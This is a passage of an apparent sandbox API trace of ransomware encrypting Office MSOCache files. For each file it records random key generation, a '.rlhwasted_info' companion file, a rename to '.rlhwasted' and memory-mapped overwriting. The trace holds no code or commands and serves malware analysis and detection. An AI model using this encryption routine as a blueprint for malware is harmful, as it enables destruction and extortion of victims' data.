HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.003] CloseHandle (hObject=0x128) returned 1 [0184.008] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1cd8 | out: hHeap=0x6b0000) returned 1 [0184.008] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed1a0 | out: hHeap=0x6b0000) returned 1 [0184.008] _aulldvrm () returned 0x0 [0184.008] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eceb8) returned 1 [0184.009] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.009] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.009] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0184.009] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b4) returned 0x6eb780 [0184.009] lstrcpyW (in: lpString1=0x6eb82a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.009] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0184.010] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eceb8) returned 1 [0184.010] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0184.010] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.010] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.011] WriteFile (in: hFile=0x128, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.012] SetEndOfFile (hFile=0x128) returned 1 [0184.012] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.013] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0184.013] lstrcpyW (in: lpString1=0x6eb82a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.rlhwasted")) returned 1 [0184.016] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0184.017] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.017] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5b1 [0184.017] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0x6a0000 [0184.017] CloseHandle (hObject=0x114) returned 1 [0184.044] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6eceb8) returned 1 [0184.045] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x1b8, pbBuffer=0x6ef538 | out: pbBuffer=0x6ef538) returned 1 [0184.045] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.045] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6eceb8) returned 1 [0184.046] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.046] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.057] SetEndOfFile (hFile=0x128) returned 1 [0184.064] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f3cd8 | out: hHeap=0x6b0000) returned 1 [0184.064] CloseHandle (hObject=0x128) returned 1 [0184.065] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.066] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed2a8 | out: hHeap=0x6b0000) returned 1 [0184.066] _aulldvrm () returned 0x0 [0184.066] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eceb8) returned 1 [0184.067] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.067] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.067] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0184.067] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b4) returned 0x6eb780 [0184.067] lstrcpyW (in: lpString1=0x6eb82a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.067] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6f3cd8 [0184.067] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eceb8) returned 1 [0184.068] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0xa34, pbBuffer=0x6f3cd8 | out: pbBuffer=0x6f3cd8) returned 1 [0184.068] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.069] WriteFile (in: hFile=0x128, lpBuffer=0x6f3cd8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6f3cd8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.070] SetEndOfFile (hFile=0x128) returned 1 [0184.070] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.070] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f3cd8 | out: hHeap=0x6b0000) returned 1 [0184.070] lstrcpyW (in: lpString1=0x6eb82a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.rlhwasted")) returned 1 [0184.076] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.076] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0184.076] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5b2 [0184.077] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0x6a0000 [0184.077] CloseHandle (hObject=0x124) returned 1 [0184.080] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6ed328) returned 1 [0184.081] CryptGenRandom (in: hProv=0x6ed328, dwLen=0x1b8, pbBuffer=0x6ef3d8 | out: pbBuffer=0x6ef3d8) returned 1 [0184.081] CryptReleaseContext (hProv=0x6ed328, dwFlags=0x0) returned 1 [0184.081] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6ed328) returned 1 [0184.082] CryptGenRandom (in: hProv=0x6ed328, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.082] CryptReleaseContext (hProv=0x6ed328, dwFlags=0x0) returned 1 [0184.095] SetEndOfFile (hFile=0x128) returned 1 [0184.098] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.098] CloseHandle (hObject=0x128) returned 1 [0184.100] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.100] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed3b0 | out: hHeap=0x6b0000) returned 1 [0184.100] _aulldvrm () returned 0x0 [0184.100] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eceb8) returned 1 [0184.101] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.101] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.101] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0184.101] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6eb780 [0184.101] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.102] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.102] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eceb8) returned 1 [0184.102] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.103] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.103] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.103] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.104] SetEndOfFile (hFile=0x128) returned 1 [0184.104] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.105] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.105] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.rlhwasted")) returned 1 [0184.121] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.121] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.121] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x32b [0184.121] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0x6a0000 [0184.121] CloseHandle (hObject=0x110) returned 1 [0184.127] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6eceb8) returned 1 [0184.128] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x1b8, pbBuffer=0x6ef3d8 | out: pbBuffer=0x6ef3d8) returned 1 [0184.128] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.128] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6eceb8) returned 1 [0184.129] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.129] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.140] SetEndOfFile (hFile=0x128) returned 1 [0184.143] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f3cd8 | out: hHeap=0x6b0000) returned 1 [0184.143] CloseHandle (hObject=0x128) returned 1 [0184.145] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.145] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecf48 | out: hHeap=0x6b0000) returned 1 [0184.145] _aulldvrm () returned 0x0 [0184.146] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6d5aa8) returned 1 [0184.147] CryptGenRandom (in: hProv=0x6d5aa8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.147] CryptReleaseContext (hProv=0x6d5aa8, dwFlags=0x0) returned 1 [0184.147] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.147] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.147] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.147] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6f3cd8 [0184.147] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6efcf0) returned 1 [0184.148] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0xa34, pbBuffer=0x6f3cd8 | out: pbBuffer=0x6f3cd8) returned 1 [0184.148] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.148] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.148] WriteFile (in: hFile=0x128, lpBuffer=0x6f3cd8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6f3cd8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.150] SetEndOfFile (hFile=0x128) returned 1 [0184.150] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.150] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f3cd8 | out: hHeap=0x6b0000) returned 1 [0184.150] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.151] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.151] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0184.152] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x16fc [0184.152] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0x6a0000 [0184.152] CloseHandle (hObject=0x124) returned 1 [0184.159] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6efcf0) returned 1 [0184.160] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x1b8, pbBuffer=0x6ef4d0 | out: pbBuffer=0x6ef4d0) returned 1 [0184.160] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.160] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6efcf0) returned 1 [0184.161] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.161] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.169] SetEndOfFile (hFile=0x128) returned 1 [0184.172] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.172] CloseHandle (hObject=0x128) returned 1 [0184.199] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.199] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed040 | out: hHeap=0x6b0000) returned 1 [0184.199] _aulldvrm () returned 0x0 [0184.199] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6efcf0) returned 1 [0184.200] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.200] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.200] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0184.200] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x6ef488 [0184.200] lstrcpyW (in: lpString1=0x6ef52c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.200] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.201] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6efcf0) returned 1 [0184.201] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.202] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.202] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.203] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.204] SetEndOfFile (hFile=0x128) returned 1 [0184.204] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.204] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.204] lstrcpyW (in: lpString1=0x6ef52c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.rlhwasted")) returned 1 [0184.205] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.205] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0184.205] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x567 [0184.206] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0x6a0000 [0184.206] CloseHandle (hObject=0x124) returned 1 [0184.208] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6efcf0) returned 1 [0184.209] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x1b8, pbBuffer=0x6ed010 | out: pbBuffer=0x6ed010) returned 1 [0184.209] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.209] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6efcf0) returned 1 [0184.210] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.210] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.219] SetEndOfFile (hFile=0x128) returned 1 [0184.221] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.221] CloseHandle (hObject=0x128) returned 1 [0184.224] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef488 | out: hHeap=0x6b0000) returned 1 [0184.224] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed4b8 | out: hHeap=0x6b0000) returned 1 [0184.224] _aulldvrm () returned 0x0 [0184.225] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6efcf0) returned 1 [0184.225] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.225] CryptReleaseContext 